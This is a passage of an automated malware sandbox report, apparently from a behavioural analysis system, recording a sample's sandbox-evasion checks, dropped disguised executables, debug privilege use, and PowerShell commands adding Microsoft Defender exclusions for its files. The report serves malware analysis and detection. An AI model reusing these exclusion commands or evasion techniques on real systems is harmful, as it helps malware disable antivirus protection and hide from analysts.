                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeMemory allocated: A80000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeMemory allocated: 1A600000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeMemory allocated: 10C0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeMemory allocated: 1ACE0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 600000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599861
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599734
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599614
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599484
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599374
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599265
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599156
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 3600000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 598968
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 598453
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 597656
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 597250
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 596578
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 596141
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595859
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595406
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595125
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594859
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594437
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594125
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 593187
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 592839
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 592484
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591969
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591625
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 591281
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 590984
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2411
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3636
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3196
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3780
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3174
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Window / User API: threadDelayed 6603
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Window / User API: threadDelayed 2798
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EBWcxehU.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rpqvmOyM.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RrWiEPnK.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iOGyhUTj.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XriZMeSE.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TxdZLwor.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CidbNaiX.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zeucltSv.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BtlmWJui.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ASylWHNt.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oyzEfRxS.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GmBsEsrN.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VDeRaRWG.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QMyIEiey.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YXDPTJnw.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\frGXBuRR.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NkpshHmC.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jUEFnHBb.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CzktcvcZ.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aEoYYxCd.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EfGUsIxp.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cNtGaFop.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eYPHaYTq.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vYOmNlRn.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FpakjsdS.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\iGWfDlte.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NAfrxSmR.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\urceIxCH.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rLFDskhr.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nUbffkpH.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UhMZMMnD.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lJFefRJG.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QVVIoUxv.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ymdvPcsA.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fijXRHyU.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mpuXdJMF.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kdkoYnoN.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CqMurJJc.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HQmkzWIi.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xuLckdTj.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bfAYobhs.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\voDmexRC.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IaGAqGnL.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wGHUzQXl.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YoKhhehz.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LGcbGTIb.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JKpAqWmX.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jeYWdqhF.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe TID: 6384 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep count: 2411 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep count: 3636 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200 Thread sleep count: 3196 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 Thread sleep count: 127 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244 Thread sleep count: 3780 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -15679732462653109s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248 Thread sleep count: 280 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236 Thread sleep count: 3174 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep count: 217 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 7748 Thread sleep time: -30000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100 Thread sleep time: -24903104499507879s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8084 Thread sleep time: -36000000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577281s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577166s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577062s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576953s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576843s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576734s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576593s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576483s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576375s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7376 Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                          Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Code function: 0_2_00007FFD9B8BEC5A GetSystemInfo,0_2_00007FFD9B8BEC5A
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Thread delayed: delay time: 30000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Thread delayed: delay time: 600000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Thread delayed: delay time: 3600000
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File opened: C:\Users\user
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File opened: C:\Users\user\AppData
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File opened: C:\Users\user\AppData\Local
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1757822050.000000001BC57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3030189423.000000001B6BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfW
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1757822050.000000001BC57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
                          Source: svchost.exe, 00000013.00000002.2902306715.000001F80EE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2904040411.000001F81425A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat"
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
